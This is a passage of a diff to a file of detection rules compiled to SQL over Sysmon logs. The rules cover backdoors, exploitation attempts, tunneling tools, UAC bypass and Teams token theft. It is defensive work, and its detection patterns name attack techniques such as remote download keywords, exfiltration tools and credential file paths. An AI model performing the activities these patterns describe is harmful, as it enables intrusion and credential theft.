The adversary may then perform actions as the logged-on user.\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "WSL (Windows Sub System For Linux)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_mstsc_remote_connection.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", - "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", + "status": "experimental", + "description": "Detects the execution of a renamed 
\"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. 
log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" 
+ "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", + "title": "AgentExecutor PowerShell Execution", + "id": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_servu_susp_child_process.yml" - }, - { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", - "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use via Intune management. 
You exclude script paths and names to reduce FP rate" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_lolbin_agentexecutor.yml" }, { - "title": "Suspicious Runscripthelper.exe", - "id": "eca49c87-8a75-4f13-9c73-a5a29e845f03", - "status": "test", - "description": "Detects execution of powershell scripts via Runscripthelper.exe", - "author": "Victor Sergeev, oscd.community", + "title": "Application Removed Via Wmic.EXE", + "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "status": "experimental", + "description": "Uninstall an application with wmic", + "author": "frac113", "tags": [ "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Runscripthelper.exe' ESCAPE '\\' AND CommandLine LIKE '%surfacecheck%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_runscripthelper.yml" + "filename": "proc_creation_win_wmic_uninstall_application.yml" }, { - "title": "Potential PowerShell Execution 
Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "status": "experimental", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Exfiltration and Tunneling 
Tools Execution", + "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Execution of well known tools for data exfiltration and tunneling", + "author": "Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1041", + "attack.t1572", + "attack.t1071.001" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\plink.exe' ESCAPE '\\' OR Image LIKE '%\\\\socat.exe' ESCAPE '\\' OR Image LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR Image LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": 
"ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.execution", - "attack.t1106" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE 
'%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Lolbin Ssh.exe Use As Proxy", - "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", - "status": "experimental", - "description": "Detect 
usage of the \"ssh.exe\" binary as a proxy to launch other programs", - "author": "frack113, Nasreddine Bencherchali", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", + "status": "test", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate usage for administration purposes" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE 
'\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ssh.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", + "status": "experimental", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "New Port Forwarding Rule Added Via Netsh.EXX", - "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", - "status": "test", - "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", - "author": "Florian Roth (Nextron Systems), omkar72, oscd.community", + "title": "Use of 
Wfc.exe", + "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + "status": "experimental", + "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activity", - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + "Legitimate use by a software developer" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" ], - "filename": "proc_creation_win_netsh_port_forwarding.yml" + "filename": "proc_creation_win_lolbin_wfc.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft 
Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", - "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", + "status": "experimental", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.discovery" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 
'%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" - }, 